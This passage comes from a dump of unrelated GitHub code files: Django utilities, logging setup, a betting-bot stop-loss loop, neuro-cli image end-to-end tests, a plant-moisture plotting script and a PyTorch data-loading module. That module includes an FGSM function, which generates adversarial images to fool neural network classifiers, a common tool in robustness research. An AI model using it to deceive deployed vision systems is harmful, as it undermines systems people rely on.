file\n return os.path.join(upload_to, filename)\n\n\ndef format_number(value):\n if value != 0:\n _value = int(value)\n return (\"{:,d}\".format(_value)).replace(\",\", \"X\").replace(\".\", \",\").replace(\"X\", \".\") if _value > 0 else ''\n return 0\n\n\ndef string_to_time(_string, _format='%d/%m/%Y %H:%M:%S'):\n try:\n return datetime.strptime(_string, _format)\n except (ValueError, IndexError, AttributeError):\n return None\n\n\ndef time_to_string(_time, _format='%d/%m/%Y %H:%M:%S'):\n if _time:\n return _time.strftime(_format)\n return ''\n\n\ndef set_toastr_message(request, _type, _message):\n request.session['csrf_coop_type'] = _type\n request.session['csrf_coop_message'] = _message\n\n\ndef get_toastr_message(request):\n if request.session.get('csrf_coop_message') and request.session.get('csrf_coop_type'):\n type = request.session['csrf_coop_type']\n message = request.session['csrf_coop_message']\n del request.session['csrf_coop_message']\n\n return type, message\n\n return None, None\n\n\ndef get_message(code):\n try:\n _code = int(code)\n language = get_language()\n\n mess_dict = MESSAGE_DICTIONARY[_code]\n\n if mess_dict:\n return mess_dict[language]\n\n return ''\n except KeyError:\n return ''\n\n\ndef mobile_valid(mobile):\n if mobile:\n try:\n mobile = re.sub(\"[^\\d+]\", \"\", mobile.replace('\\\\', ''))\n except ValueError:\n mobile = None\n\n return mobile\n\n\ndef check_email_valid(email):\n pattern = r'^(([^<>()\\[\\]\\\\.,:\\s@\"]+(\\.[^<>()\\[\\]\\\\.,:\\s@\"]+)*)|(\".+\"))@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))'\n\n regex = re.compile(pattern)\n\n if regex.search(email):\n return\n\n\ndef convert_none_to_empty(x):\n ret = copy.deepcopy(x)\n if isinstance(x, dict):\n for k, v in ret.items():\n ret[k] = convert_none_to_empty(v)\n if isinstance(x, (list, tuple)):\n for k, v in enumerate(ret):\n ret[k] = convert_none_to_empty(v)\n if x is None:\n ret = ''\n return ret\n","repo_name":"honghuynhit/django_tut","sub_path":"library/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23795474494","text":"\"\"\"Module that handles logger setup.\"\"\"\nimport logging\nimport os\n\nfrom pythonjsonlogger import jsonlogger\n\n# Adapted from https://docs.python.org/2/library/logging.html#logrecord-attributes\n_LOG_LEVEL = os.environ.get('LOG_LEVEL', 'INFO').upper()\n_LOG_FORMAT = '%(asctime)%(levelname)%(message)%(name)'\n_LOG_FORMATTER = jsonlogger.JsonFormatter(_LOG_FORMAT)\n\n\ndef _raise_test_plugin_logging_level_to_error() -> None:\n \"\"\"Raise the default test plugin logging level to `ERROR`.\n\n Some test plugin loggers have a default logging level of `debug`. This severely hinders\n debugabbility of code, since test plugin logs will swamp `stdout` if any test fails.\n\n To resolve this, we raise the default logging level of test plugin to `ERROR` here.\n\n \"\"\"\n logging.getLogger('flake8').setLevel(logging.ERROR)\n logging.getLogger('filelock').setLevel(logging.ERROR)\n\n\ndef configure_logging() -> None:\n \"\"\"Configure the project logging.\n\n This function configures the project logging, all loggers instantiated after calling\n this function will inherit this configuration.\n\n This function should be called at the very start of running the application, else loggers\n with different configurations may be instantiated.\n\n \"\"\"\n _raise_test_plugin_logging_level_to_error()\n\n log_handler = logging.StreamHandler()\n log_handler.setFormatter(_LOG_FORMATTER)\n\n root_logger = logging.getLogger()\n root_logger.setLevel(_LOG_LEVEL)\n root_logger.addHandler(log_handler)\n","repo_name":"BracketJohn/is-this-an-mlm","sub_path":"backend/src/backend/_logging.py","file_name":"_logging.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"71446999462","text":"import requests\nfrom datetime import datetime\nfrom datetime import timedelta\nimport time\nfrom utils import get_wallet_balance, get_if_user_has_open_bet\nfrom constants import wallet\n\n\nnow = round(datetime.timestamp(datetime.now()), 0)\n\n\nINITIAL_BALANCE = get_wallet_balance(wallet)\nCURRENT_BALANCE = get_wallet_balance(wallet)\nLOSS_LIMIT_PERCENTAGE = 0.7\n\n\ncurrent_hour = datetime.utcfromtimestamp(now).hour\ncurrent_minute = datetime.utcfromtimestamp(now).minute\n\n\nwhile True:\n has_open_bet = get_if_user_has_open_bet()\n\n if current_hour == 0 and current_minute == 0:\n INITIAL_BALANCE = get_wallet_balance(wallet)\n\n CURRENT_BALANCE = get_wallet_balance(wallet)\n\n if not has_open_bet and CURRENT_BALANCE <= INITIAL_BALANCE * LOSS_LIMIT_PERCENTAGE:\n print('SHIT JUST HIT THE FAN BROU!')\n\n time.sleep(60)\n","repo_name":"jeezascodes/pancakeBot","sub_path":"stop_loss.py","file_name":"stop_loss.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41113304324","text":"import asyncio\nimport re\nimport subprocess\nimport time\nfrom dataclasses import replace\nfrom pathlib import Path\nfrom typing import Any, AsyncIterator, Set\nfrom uuid import uuid4 as uuid\n\nimport aiodocker\nimport pytest\nfrom yarl import URL\n\nfrom neuro_sdk import CONFIG_ENV_NAME, DEFAULT_CONFIG_PATH, JobStatus\n\nfrom tests.e2e import Helper, make_image_name\n\n\ndef parse_docker_ls_output(docker_ls_output: Any) -> Set[str]:\n return {\n repo_tag\n for info in docker_ls_output\n if info[\"RepoTags\"] is not None\n for repo_tag in info[\"RepoTags\"]\n if repo_tag\n }\n\n\n@pytest.fixture()\ndef tag() -> str:\n return str(uuid())\n\n\nasync def generate_image(docker: aiodocker.Docker, tag: str) -> str:\n name = make_image_name()\n image_archive = Path(__file__).parent / \"assets/echo-tag.tar\"\n # TODO use random image name here\n image_name = f\"{name}:{tag}\"\n with image_archive.open(mode=\"r+b\") as fileobj:\n await docker.images.build(\n fileobj=fileobj, tag=image_name, buildargs={\"TAG\": tag}, encoding=\"identity\"\n )\n\n return image_name\n\n\n@pytest.fixture()\nasync def image(docker: aiodocker.Docker, tag: str) -> AsyncIterator[str]:\n image = await generate_image(docker, tag)\n yield image\n await docker.images.delete(image, force=True)\n\n\n@pytest.mark.e2e\ndef test_images_complete_lifecycle(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n event_loop: asyncio.AbstractEventLoop,\n docker: aiodocker.Docker,\n) -> None:\n image_full_str = f\"image://{helper.cluster_uri_base}/{image}\"\n image_full_str_no_tag = image_full_str.replace(f\":{tag}\", \"\")\n request.addfinalizer(lambda: helper.run_cli([\"image\", \"rm\", image_full_str_no_tag]))\n # Let`s push image\n captured = helper.run_cli([\"image\", \"push\", image])\n event_loop.run_until_complete(\n docker.images.delete(f\"{helper.registry_name_base}/{image}\", force=True)\n )\n\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n\n assert captured.out.endswith(image_full_str)\n image_url = URL(image_full_str)\n\n # Check if image available on registry\n image_full_str = f\"image://{helper.cluster_uri_base}/{image}\"\n image_short_str = f\"image:{image}\"\n assert captured.out.endswith(image_full_str)\n\n image_short_str_no_tag = image_short_str.replace(f\":{tag}\", \"\")\n\n # check ls short mode\n captured = helper.run_cli([\"image\", \"ls\"])\n assert image_short_str_no_tag in [\n line.strip() for line in captured.out.splitlines()\n ]\n\n captured = helper.run_cli([\"image\", \"ls\", \"--full-uri\"])\n assert image_full_str_no_tag in [line.strip() for line in captured.out.splitlines()]\n\n # check ls long mode\n captured = helper.run_cli([\"image\", \"ls\", \"-l\"])\n for line in captured.out.splitlines():\n if image_short_str_no_tag in line:\n break\n else:\n assert False, f\"Not found {image_short_str_no_tag} in {captured.out}\"\n\n # delete local\n event_loop.run_until_complete(docker.images.delete(image, force=True))\n docker_ls_output = event_loop.run_until_complete(docker.images.list())\n local_images = parse_docker_ls_output(docker_ls_output)\n assert image not in local_images\n\n # Pull image as with another tag\n captured = helper.run_cli([\"image\", \"pull\", f\"image:{image}\"])\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n assert captured.out.endswith(image)\n\n # check pulled locally, delete for cleanup\n docker_ls_output = event_loop.run_until_complete(docker.images.list())\n local_images = parse_docker_ls_output(docker_ls_output)\n assert image in local_images\n\n # Execute image and check result\n captured = helper.run_cli_run_job([\"--no-wait-start\", str(image_url)], verbosity=-1)\n assert not captured.err\n job_id = captured.out\n assert job_id.startswith(\"job-\")\n helper.wait_job_change_state_to(job_id, JobStatus.SUCCEEDED, JobStatus.FAILED)\n\n helper.check_job_output(job_id, re.escape(tag))\n\n\n@pytest.mark.e2e\ndef test_image_tags(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n event_loop: asyncio.AbstractEventLoop,\n docker: aiodocker.Docker,\n) -> None:\n image_full_str = f\"image://{helper.cluster_uri_base}/{image}\"\n image_full_str_no_tag = image_full_str.replace(f\":{tag}\", \"\")\n request.addfinalizer(lambda: helper.run_cli([\"image\", \"rm\", image_full_str_no_tag]))\n # push image\n captured = helper.run_cli([\"image\", \"push\", image])\n event_loop.run_until_complete(\n docker.images.delete(f\"{helper.registry_name_base}/{image}\", force=True)\n )\n\n assert captured.out.endswith(image_full_str)\n\n delay = 0\n t0 = time.time()\n\n while time.time() - t0 < 600:\n time.sleep(delay)\n # check the tag is present now\n try:\n captured = helper.run_cli(\n [\"image\", \"tags\", image_full_str_no_tag], timeout=300\n )\n except subprocess.TimeoutExpired:\n continue\n if tag in map(lambda s: s.strip(), captured.out.splitlines()):\n break\n # Give a chance to sync remote registries\n delay = min(delay * 2 + 1, 15)\n else:\n raise AssertionError(\n f\"Delay is reached on waiting for tag {tag} in {captured.out}\"\n )\n\n cmd = f\"neuro image tags {image_full_str}\"\n result = subprocess.run(cmd, capture_output=True, shell=True)\n assertion_msg = f\"Command {cmd} should fail: {result.stdout!r} {result.stderr!r}\"\n assert result.returncode, assertion_msg\n\n image_full_str_latest_tag = image_full_str.replace(f\":{tag}\", \":latest\")\n cmd = f\"neuro image tags {image_full_str_latest_tag}\"\n result = subprocess.run(cmd, capture_output=True, shell=True)\n assertion_msg = f\"Command {cmd} should fail: {result.stdout!r} {result.stderr!r}\"\n assert result.returncode, assertion_msg\n\n\n@pytest.mark.e2e\nasync def test_images_delete(\n request: Any,\n helper: Helper,\n docker: aiodocker.Docker,\n) -> None:\n image_ref = await generate_image(docker, tag=\"latest\")\n name, _ = image_ref.split(\":\")\n img_name = f\"image:{name}\"\n\n helper.run_cli([\"image\", \"push\", image_ref])\n try:\n await docker.images.delete(image_ref, force=True)\n await docker.images.delete(\n f\"{helper.registry_name_base}/{image_ref}\", force=True\n )\n\n captured = helper.run_cli([\"-q\", \"image\", \"ls\"])\n assert img_name in captured.out\n finally:\n helper.run_cli([\"image\", \"rm\", img_name])\n\n for _ in range(10):\n captured = helper.run_cli([\"-q\", \"image\", \"ls\"])\n if img_name in captured.out:\n time.sleep(5)\n else:\n break\n\n assert img_name not in captured.out\n\n\n@pytest.mark.e2e\nasync def test_images_push_with_specified_name(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n event_loop: asyncio.AbstractEventLoop,\n docker: aiodocker.Docker,\n) -> None:\n # Let`s push image\n image_no_tag = image.replace(f\":{tag}\", \"\")\n pushed_no_tag = f\"{image_no_tag}-pushed\"\n pulled_no_tag = f\"{image_no_tag}-pulled\"\n pulled = f\"{pulled_no_tag}:{tag}\"\n request.addfinalizer(\n lambda: helper.run_cli([\"image\", \"rm\", f\"image:{pushed_no_tag}\"])\n )\n\n captured = helper.run_cli([\"image\", \"push\", image, f\"image:{pushed_no_tag}:{tag}\"])\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n image_pushed_full_str = f\"image://{helper.cluster_uri_base}/{pushed_no_tag}:{tag}\"\n async with helper.client() as client:\n assert captured.out.endswith(image_pushed_full_str)\n\n # Check if image available on registry\n docker_ls_output = await docker.images.list()\n local_images = parse_docker_ls_output(docker_ls_output)\n assert pulled not in local_images\n\n async with helper.client() as client:\n image_pushed_full = client.parse.remote_image(image_pushed_full_str)\n image_url_without_tag = replace(image_pushed_full, tag=None)\n imgs = await client.images.list()\n assert image_url_without_tag in imgs\n\n # check locally\n docker_ls_output = await docker.images.list()\n local_images = parse_docker_ls_output(docker_ls_output)\n assert pulled not in local_images\n\n # Pull image as with another name\n captured = helper.run_cli([\"image\", \"pull\", f\"image:{pushed_no_tag}:{tag}\", pulled])\n try:\n # stderr has \"Used image ...\" lines\n # assert not captured.err\n assert captured.out.endswith(pulled)\n # check locally\n docker_ls_output = await docker.images.list()\n local_images = parse_docker_ls_output(docker_ls_output)\n assert pulled in local_images\n finally:\n await docker.images.delete(pulled, force=True)\n\n\n@pytest.mark.e2e\ndef test_docker_helper(\n request: Any,\n helper: Helper,\n image: str,\n tag: str,\n nmrc_path: Path,\n monkeypatch: Any,\n) -> None:\n monkeypatch.setenv(CONFIG_ENV_NAME, str(nmrc_path or DEFAULT_CONFIG_PATH))\n helper.run_cli([\"config\", \"docker\"])\n full_tag = f\"{helper.registry_name_base}/{image}\"\n rmi_cmd = f\"docker rmi {full_tag}\"\n request.addfinalizer(\n lambda: subprocess.run(rmi_cmd, capture_output=True, shell=True)\n )\n tag_cmd = f\"docker tag {image} {full_tag}\"\n result = subprocess.run(tag_cmd, capture_output=True, shell=True)\n assert (\n result.returncode == 0\n ), f\"Command {tag_cmd} failed: {result.stdout!r} {result.stderr!r} \"\n image_url = f\"image://{helper.cluster_uri_base}/{image}\"\n image_full_str_no_tag = image_url.replace(f\":{tag}\", \"\")\n request.addfinalizer(lambda: helper.run_cli([\"image\", \"rm\", image_full_str_no_tag]))\n push_cmd = f\"docker push {full_tag}\"\n result = subprocess.run(push_cmd, capture_output=True, shell=True)\n assert (\n result.returncode == 0\n ), f\"Command {push_cmd} failed: {result.stdout!r} {result.stderr!r} \"\n # Run image and check output\n job_id = helper.run_job_and_wait_state(\n image_url, \"\", wait_state=JobStatus.SUCCEEDED, stop_state=JobStatus.FAILED\n )\n helper.check_job_output(job_id, re.escape(tag))\n","repo_name":"neuro-inc/neuro-cli","sub_path":"neuro-cli/tests/e2e/test_e2e_images.py","file_name":"test_e2e_images.py","file_ext":"py","file_size_in_byte":10142,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"35"} +{"seq_id":"24784111327","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.indexlogin), #start as login\n url(r'^register$', views.register),#register page\n url(r'^create$', views.createuser), #registers the user\n url(r'^dashboard/$', views.dashboard),#main page\n url(r'^dashboard/(?P\\d+)$', views.dashboard), #dashboard redirect with user.\n url(r'^delete/(?P\\d+)$', views.delete),# Deletes a appointment \n url(r'^edit/(?P\\d+)$', views.edit),# Deletes a appointment \n \n url(r'^loginprocess$', views.loginprocess), #logs in the user\n url(r'^update$', views.update), #logs in the user\n url(r'^add/(?P\\d+)$', views.add),# add the trip process\n url(r'^add$', views.add),# add the trip process\n url(r'^logout$', views.logout),#log out\n]\n# url(r'^showappointment/(?P\\d+)$', views.showappointment),# show a appointment ","repo_name":"Exia01/Python","sub_path":"Django/Pending_Projects/PBeltExam4/main/apps/xapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"75027782820","text":"\n# Reads information from sqlite and creates graphs with plot.ly\n\nimport pandas as pd\nfrom sqlalchemy import create_engine # database connection\nimport datetime as dt\n\nimport plotly.plotly as py # interactive graphing\nimport plotly.graph_objs as go\n\nimport configparser\nimport argparse\nimport logging\n\nDEFAULT_CONFIG_FILE = \"config.ini\"\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--config\", help=\"Config file. If not provided, \" + DEFAULT_CONFIG_FILE + \" will be used.\",\n default=DEFAULT_CONFIG_FILE)\n parser.add_argument(\"-v\", \"--verbose\", help=\"increase verbosity\", action=\"store_true\")\n args = parser.parse_args()\n\n config = configparser.ConfigParser()\n try:\n config.read(args.config)\n\n except:\n print('Error reading config file')\n exit()\n\n logger = logging.getLogger(config['Logging']['LoggerName'])\n disk_engine = create_engine('sqlite:///' + config['Database']['FilePath'])\n\n df_1 = pd.read_sql_query('SELECT date, moisture '\n 'FROM moistureRead '\n 'WHERE plant = 1 '\n 'ORDER BY date', disk_engine)\n\n # normalize\n moistureMaxLevel = int(config['Graph']['MoistureMaxLevel'])\n moistureMinLevel = int(config['Graph']['MoistureMinLevel'])\n\n #Note that the higher moisture level, the dryer and the lower, soil is more wet\n df_1['moisture'] = 100 - (\n (df_1[\"moisture\"] - moistureMaxLevel) / (moistureMinLevel - moistureMaxLevel)) * 100\n\n df_2 = pd.read_sql_query('SELECT date, waterAmount '\n 'FROM watering '\n 'WHERE plant = 1 '\n 'ORDER BY date', disk_engine)\n\n\n\n trace_1 = go.Scatter(\n x=df_1['date'],\n y=df_1['moisture'],\n name='Soil Moisture',\n mode='lines',\n line=dict(color='rgb(205, 12, 24)', width=2),\n connectgaps=True,\n )\n\n trace_2 = go.Scatter(\n x=df_2['date'],\n y=df_2['waterAmount'],\n name='Watering',\n yaxis='y2',\n mode='markers',\n marker=dict(\n size=10,\n color='rgb(49, 130, 189)',\n ),\n )\n\n layout = go.Layout(\n xaxis=dict(\n showline=True,\n showgrid=False,\n showticklabels=True,\n linecolor='rgb(204, 204, 204)',\n linewidth=2,\n ticks='outside',\n tickcolor='rgb(204, 204, 204)',\n tickwidth=2,\n ticklen=5,\n tickfont=dict(\n family='Arial',\n size=12,\n color='rgb(82, 82, 82)',\n ),\n ),\n yaxis=dict(\n title='Soil Moisture',\n showgrid=False,\n zeroline=True,\n showline=True,\n showticklabels=True,\n type='linear',\n range=[1, 100],\n dtick=20,\n ticksuffix='%'\n ),\n yaxis2=dict(\n title='Watering',\n titlefont=dict(\n color='rgb(49, 130, 189)'\n ),\n tickfont=dict(\n color='rgb(49, 130, 189)'\n ),\n overlaying='y',\n side='right',\n range=[0, 0.2],\n dtick=0.05,\n )\n )\n\n fig = go.Figure(data=[trace_1, trace_2], layout=layout)\n py.plot(fig, filename='Soil moisture evolution')\n","repo_name":"tjavier82/irrigation_system","sub_path":"daemon/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"18762683436","text":"\"\"\"Provides data loading functionality through data loaders, wrappers and helper functions.\"\"\"\n\nimport os\nimport multiprocessing as mp\nimport ctypes\nfrom typing import Tuple, List, Union\n\nimport numpy as np\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Module, Sequential, CrossEntropyLoss\nfrom torch.utils.data.dataset import Dataset\nfrom torch.utils.data.dataloader import DataLoader\nfrom torchvision.transforms import (Compose, ToTensor, Normalize, RandomHorizontalFlip, RandomCrop, CenterCrop, Resize,\n RandomResizedCrop, RandomAffine, ColorJitter, RandomRotation)\nfrom torchvision.datasets import MNIST, KMNIST, CIFAR10, SVHN, ImageFolder\nfrom tqdm import tqdm\nfrom PIL import Image\nfrom PIL.Image import Image as Img\nimport scipy.io\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nImage.MAX_IMAGE_PIXELS = 688290000\ntorch.manual_seed(0)\n\n\ndef fgsm(model: Union[Module, Sequential],\n images: Tensor,\n labels: Tensor,\n criterion=CrossEntropyLoss(),\n epsilon: float = 0.1) -> Tensor:\n \"\"\"The Fast Gradient Sign Method from `Explaining and Harnessing Adversarial Examples\n `_ by Goodfellow et al.\n\n The main idea is to change each pixel in the image according to the sign of the gradient of the loss w.r.t. the\n image pixels by a small amount. This implementation is adapted from the `PyTorch tutorial\n `_.\n\n Args:\n model: A `torchvision` or custom neural network.\n images: The image data.\n labels: The class labels.\n criterion (optional): Any PyTorch loss criterion.\n epsilon (optional): The step size of the FGSM.\n\n Returns:\n Tensor: The perturbed images.\n \"\"\"\n vmin, vmax = images.min().numpy(), images.max().numpy()\n images.requires_grad = True\n\n logits = model(images)\n loss = criterion(logits, labels)\n model.zero_grad()\n loss.backward()\n\n data_grad = images.grad.data\n sign_data_grad = data_grad.sign()\n perturbed_image = images + epsilon * sign_data_grad\n perturbed_image = torch.clamp(perturbed_image, vmin, vmax)\n\n return perturbed_image\n\n\nclass Binarize:\n \"\"\"Randomly binarizes monochrome images where pixel values determine the probability.\"\"\"\n\n def __call__(self,\n pic: Img):\n \"\"\"Randomly binarizes a monochrome image where pixel values determine the probability.\n\n Args:\n pic: A single monochrome image.\n\n Returns:\n The binarized image.\n \"\"\"\n return Image.fromarray(np.uint8(np.random.binomial(1, np.array(pic) / 255) * 255))\n\n\nclass Memory(Dataset):\n \"\"\"Stores a dataset in RAM.\"\"\"\n\n def __init__(self,\n data: Dataset,\n img_size: int = 224,\n channels: int = 3):\n \"\"\"Creates a `Memory` object, storing a dataset in RAM.\n\n Args:\n data: A PyTorch dataset.\n img_size (optional): The size of the image.\n channels (optional): Number of color channels, i.e. 3 for RGB and 1 for monochrome images.\n \"\"\"\n self.data = data\n self.images = torch.zeros(len(data), channels, img_size, img_size)\n self.targets = torch.zeros(len(data)).long()\n self.use_cache = False\n\n def pin_memory(self):\n \"\"\"Uses the PyTorch mechanism of pinning data to memory.\"\"\"\n self.images = self.images.pin_memory()\n self.targets = self.targets.pin_memory()\n return self\n\n def set_use_cache(self,\n use_cache: bool):\n \"\"\"Switch activating the use of the stored data.\n\n Args:\n use_cache: Whether to use the cache.\n \"\"\"\n self.use_cache = use_cache\n\n def __getitem__(self,\n index: int):\n if self.use_cache:\n if index < 1:\n return self.images, self.targets\n else:\n raise StopIteration()\n else:\n self.images[index] = self.data[index][0]\n self.targets[index] = self.data[index][1]\n return self.images[index], self.targets[index]\n\n def __len__(self):\n if self.use_cache:\n return 1\n else:\n return len(self.data)\n\n\nclass Cashed(Dataset):\n \"\"\"Similar to the Memory class, but can be used with multiprocessing.\"\"\"\n\n def __init__(self,\n data: Dataset,\n img_size: int = 224,\n channels: int = 3):\n \"\"\"Creates a `Cashed` object, storing a dataset in RAM.\n\n Args:\n data: A PyTorch dataset.\n img_size: The size of the image.\n channels: Number of color channels, i.e. 3 for RGB and 1 for monochrome images.\n \"\"\"\n self.data = data\n shared_array_base = mp.Array(ctypes.c_float, len(data) * channels * img_size ** 2)\n shared_array_base_labels = mp.Array(ctypes.c_long, len(data))\n shared_array = np.ctypeslib.as_array(shared_array_base.get_obj())\n shared_array_labels = np.ctypeslib.as_array(shared_array_base_labels.get_obj())\n shared_array = shared_array.reshape(len(data), channels, img_size, img_size)\n self.shared_array = torch.from_numpy(shared_array)\n self.shared_array_labels = torch.from_numpy(shared_array_labels).long()\n self.use_cache = False\n\n def pin_memory(self):\n \"\"\"Uses the PyTorch mechanism of pinning data to memory.\"\"\"\n self.shared_array = self.shared_array.pin_memory()\n self.shared_array_labels = self.shared_array_labels.pin_memory()\n return self\n\n def set_use_cache(self,\n use_cache: bool):\n \"\"\"Switch activating the use of the stored data.\n\n Args:\n use_cache (bool): Whether to use the cache.\n \"\"\"\n self.use_cache = use_cache\n\n def __getitem__(self,\n index: int):\n if not self.use_cache:\n self.shared_array[index] = self.data[index][0]\n self.shared_array_labels[index] = self.data[index][1]\n return self.shared_array[index], self.shared_array_labels[index]\n\n def __len__(self):\n return len(self.data)\n\n\nLoaderTypes = Union[DataLoader,\n Memory,\n List[DataLoader],\n List[Memory]]\n\n\ndef uci(root: str,\n name: str,\n split: int = 1):\n if name.lower() in [\"boston\", \"housing\", \"boston housing\", \"boston_housing\"]:\n path = os.path.join(root, \"boston_housing.data\")\n data = np.loadtxt(path)\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() == \"kin8nm\":\n path = os.path.join(root, \"kin8nm.csv\")\n data = np.loadtxt(path, delimiter=',', skiprows=1)\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() in [\"naval\", \"naval propulsion\", \"naval_propulsion\"]:\n path = os.path.join(root, \"naval_propulsion.txt\")\n data = np.loadtxt(path)\n inputs, targets = data[:, :-2], data[:, -2:]\n elif name.lower() in [\"protein\", \"protein structure\", \"protein_structure\"]:\n path = os.path.join(root, \"protein_structure.csv\")\n data = np.loadtxt(path, delimiter=',', skiprows=1)\n inputs, targets = data[:, 1:], data[:, 0]\n elif name.lower() in [\"wine\", \"wine quality\", \"wine quality red\", \"wine_quality\", \"wine_quality_red\"]:\n path = os.path.join(root, \"wine_quality_red.csv\")\n data = np.loadtxt(path, delimiter=';', skiprows=1)\n inputs, targets = data[:, :-1], data[:, -1]\n if name.lower() in [\"yacht\", \"yacht hydrodynamics\", \"yacht_hydrodynamics\"]:\n path = os.path.join(root, \"yacht_hydrodynamics.data\")\n data = np.loadtxt(path)\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() in [\"power\", \"power plant\", \"combined cycle power plant\", \"power_plant\",\n \"combined_cycle_power_plant\"]:\n path = os.path.join(root, \"combined_cycle_power_plant.xlsx\")\n data = pd.read_excel(path).to_numpy()\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() in [\"concrete\", \"concrete compression\", \"concrete compression strength\", \"concrete_compression\",\n \"concrete_compression_strength\"]:\n path = os.path.join(root, \"concrete_compression_strength.xls\")\n data = pd.read_excel(path).to_numpy()\n inputs, targets = data[:, :-1], data[:, -1]\n elif name.lower() in [\"energy\", \"efficiency\", \"energy efficiency\", \"energy_efficiency\"]:\n path = os.path.join(root, \"energy_efficiency.xlsx\")\n data = pd.read_excel(path).to_numpy()\n inputs, targets = data[:, :-2], data[:, -2:]\n\n if len(targets.shape) < 2:\n targets = np.expand_dims(targets, axis=1)\n\n x_train, x_test, y_train, y_test = train_test_split(inputs, targets, test_size=.1, random_state=split)\n return (x_train, y_train), (x_test, y_test)\n\n\ndef sarcos(root: str):\n sarcos_inv = scipy.io.loadmat(os.path.join(root, \"sarcos_inv.mat\"))\n sarcos_inv_test = scipy.io.loadmat(os.path.join(root, \"sarcos_inv_test.mat\"))\n\n x_train = sarcos_inv[\"sarcos_inv\"][:, :21]\n y_train = sarcos_inv[\"sarcos_inv\"][:, 21:]\n x_test = sarcos_inv_test[\"sarcos_inv_test\"][:, :21]\n y_test = sarcos_inv_test[\"sarcos_inv_test\"][:, 21:]\n\n return (x_train, y_train), (x_test, y_test)\n\n\ndef kuka(root: str, part=1):\n train = np.loadtxt(os.path.join(root, f\"kuka_real_dataset{part}\", f\"kuka{part}_online.txt\"))\n test = np.loadtxt(os.path.join(root, f\"kuka_real_dataset{part}\", f\"kuka{part}_offline.txt\"))\n\n x_train = train[:, :21]\n y_train = train[:, 21:]\n x_test = test[:, :21]\n y_test = test[:, 21:]\n\n return (x_train, y_train), (x_test, y_test)\n\n\ndef mnist(root: str,\n batch_size: int = 32,\n workers: int = 6,\n augment: bool = True,\n splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n \"\"\"Wrapper for loading the `MNIST` dataset.\n\n Args:\n root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n batch_size: The batch size.\n workers: The number of CPUs to use for when loading the data from disk.\n augment: Whether to use data augmentation when training.\n splits: Which splits of the data to return. Possible values are `train`, `val` and `test`.\n\n Returns:\n A list data loaders of the chosen splits.\n \"\"\"\n val_transform = ToTensor()\n if augment:\n transform = Compose([Binarize(), ToTensor()])\n else:\n transform = val_transform\n\n loader_list = list()\n if 'train' in splits:\n train_set = MNIST(root, train=True, transform=transform, download=True)\n train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers, pin_memory=True)\n loader_list.append(train_loader)\n if 'test' in splits or 'val' in splits:\n val_test_set = MNIST(root, train=False, transform=val_transform, download=True)\n val_set, test_set = torch.utils.data.random_split(val_test_set, [5000, 5000])\n\n if 'val' in splits:\n val_set = Memory(val_set, img_size=28, channels=1)\n for _ in val_set:\n pass\n val_set.set_use_cache(True)\n val_set.pin_memory()\n loader_list.append(val_set)\n\n if 'test' in splits:\n test_set = Memory(test_set, img_size=28, channels=1)\n for _ in test_set:\n pass\n test_set.set_use_cache(True)\n test_set.pin_memory()\n loader_list.append(test_set)\n\n if len(loader_list) == 1:\n return loader_list[0]\n return loader_list\n\n\ndef kmnist(root: str,\n batch_size: int = 32,\n workers: int = 6,\n splits: Union[str, Tuple[str]] = ('train', 'val')) -> LoaderTypes:\n \"\"\"Wrapper for loading the `KMNIST` dataset.\n\n Args:\n root: The root directory where the dataset is stored. Usually ~/.torch/datasets.\n batch_size: The batch size.\n workers: The number of CPUs to use for when loading the data from disk.\n splits: Which splits of the data to return. Possible values are `train`, `val` and `test`.\n\n Returns:\n A list data loaders of the chosen splits.\n \"\"\"\n loader_list = list()\n if 'train' in splits or 'val' in splits:\n train_val_set = KMNIST(root, train=True, download=True, transform=ToTensor())\n\n val_set, train_set = torch.utils.data.random_split(train_val_set, [10000, len(train_val_set) - 10000])\n if 'train' in splits:\n train_loader = DataLoader(train_set, batch_size=batch_size, shuffle=True, num_workers=workers,\n pin_memory=True)\n loader_list.append(train_loader)\n if 'val' in splits:\n val_set = Memory(val_set, img_size=28, channels=1)\n for _ in val_set:\n pass\n val_set.set_use_cache(True)\n val_set.pin_memory()\n loader_list.append(val_set)\n if 'test' in splits:\n test_set = KMNIST(root, train=False, download=True, transform=ToTensor())\n test_set = Memory(test_set, img_size=28, channels=1)\n for _ in test_set:\n pass\n test_set.set_use_cache(True)\n test_set.pin_memory()\n loader_list.append(test_set)\n\n if len(loader_list) == 1:\n return loader_list[0]\n return loader_list\n\n\ndef cifar10(root: str,\n batch_size: int = 32,\n 